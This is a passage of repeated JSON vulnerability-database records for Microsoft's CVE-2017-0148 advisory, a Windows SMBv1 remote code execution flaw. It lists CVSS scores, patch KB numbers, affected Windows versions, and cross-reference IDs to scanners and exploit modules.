["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-12T20:49:50", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", 
"OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3205409", "KB4012606", "KB4013429", "KB4012212", "KB4012598", "KB4012213", "KB4012215", "KB3210721", "KB3205401", "KB4012216", "KB3212646", "KB3210720", "KB3213986", "KB4013198", "KBMS16-110, 3187754", "KB4012214", "KB3177186", "KB4012217"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 
2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit 
systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": 
"KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", 
"msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based 
Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T20:49:50", "differentElements": ["msAffectedSoftware"], "edition": 39}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "47d8cff84559a6e03e5ea58b880c90dc", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": 
"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-12T22:47:20", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", 
"MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012215", "KB3210720", "KB3205401", "KB4013198", "KB4012216", "KB3205409", "KB3212646", "KB3213986", "KB4012213", "KBMS16-110, 3187754", "KB4012212", "KB4012598", "KB4012606", "KB4012217", "KB4013429", "KB4012214", "KB3177186", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core 
installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, 
{"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-12T22:47:20", "differentElements": ["msAffectedSoftware"], "edition": 40}, {"bulletin": {"id": "MS:CVE-2017-0148", "hash": "1455b21b7b338994ddec7ae57c94d0af", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution 
vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0148", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0148"], "immutableFields": [], "lastseen": "2021-09-13T00:46:29", "history": [], "viewCount": 106, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0148"]}, {"type": "symantec", "idList": ["SMNTC-96706"]}, {"type": "thn", "idList": ["THN:18A54BDD63D7DC2B3284D326E6510150"]}, 
{"type": "mskb", "idList": ["KB4013389", "KB4012598"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:7F979181993247D214BE9DB570C22482", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:CE638F8710DF0090997AF6FB196E2595", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27752", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-33313"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700059.PRM", "SMB_NT_MS17-010.NASL", "700099.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA11902", "KLA10979", "KLA10977"]}, {"type": "ics", "idList": ["ICSMA-18-058-02"]}], "modified": "2021-09-12T06:51:00", "rev": 2}, "score": {"value": 7.3, "vector": "NONE", "modified": "2021-09-12T06:51:00", "rev": 2}}, "objectVersion": "1.6", "kbList": 
["KB3210721", "KB4012214", "KB4012212", "KB3210720", "KB4013198", "KB3212646", "KB3177186", "KB4012216", "KB3205401", "KB4013429", "KB4012213", "KB3205409", "KB4012598", "KB4012606", "KB4012217", "KB3213986", "KB4012215", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0148", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": 
